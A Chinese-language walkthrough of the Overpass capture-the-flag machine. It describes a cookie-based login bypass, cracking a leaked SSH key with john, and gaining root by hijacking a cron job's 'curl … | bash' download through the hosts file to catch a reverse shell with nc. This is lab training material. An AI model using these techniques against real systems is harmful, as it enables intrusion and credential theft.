CTF靶机 Overpass 笔记

Overpass

当一群计算机科学专业的学生试图创建一个密码管理器时会发生什么?


Nmap起手,先扫一波开放端口。得到22,80端口开放CTF靶机 Overpass 笔记

访问80端口,是一个Overpass的网站页面CTF靶机 Overpass 笔记

dirb一下目录,有个admin的目录CTF靶机 Overpass 笔记

访问是一个登录的页面,感觉切入点应该在这,尝试了注入,登录绕过,弱口令均没有成功。

查看页面源代码时发先包含一个login.js的文件CTF靶机 Overpass 笔记

如果页面没有Incorrect credentials时会把Cookie设置成SessionTokenCTF靶机 Overpass 笔记

 

尝试把Cookie的值改成SessionToken,值默认的 作用域改成/CTF靶机 Overpass 笔记

改成这样CTF靶机 Overpass 笔记

刷新页面,就进来了,页面里是一个ssh的私钥

这个应该是james用户的私钥CTF靶机 Overpass 笔记

把私钥复制出来用john**出密码CTF靶机 Overpass 笔记

 

获取私钥的hash要用到ssh2john

git clone https://github.com/magnumripper/JohnTheRipper

克隆下来后用ssh2john 把hash重定向出来CTF靶机 Overpass 笔记

看下重定向出来的hashCTF靶机 Overpass 笔记

用john加载rockyou**hash

得到密码james13

CTF靶机 Overpass 笔记

把记得id_rsa的权限设置成600才能用私钥登录

输入刚刚得到的密码CTF靶机 Overpass 笔记

进来就能拿到user.txt flag 里面还有一个todo.txt的文件

提示有个构造的脚本

CTF靶机 Overpass 笔记

看下定时任务,里面有个curl overpass.thm/downloads/src/buildsript.sh | bash

请求overpass.thm网站的buoldscript.sh 并执行CTF靶机 Overpass 笔记

那可以修改Hosts文件把overpass.thm的域名指向到我们的攻击机上。

再用python搭建构造这样一个目录结构的网站把shell弹回来CTF靶机 Overpass 笔记

先把目录给创建好 mkdir downloads/src/

在把创建好的文件放进去,里面是个反弹shell

CTF靶机 Overpass 笔记

这边python网站很快就有反应

另外nc也要起个监听

CTF靶机 Overpass 笔记

nc起监听等待一会,马上shell 就回来了。直接查看root.txt

CTF靶机 Overpass 笔记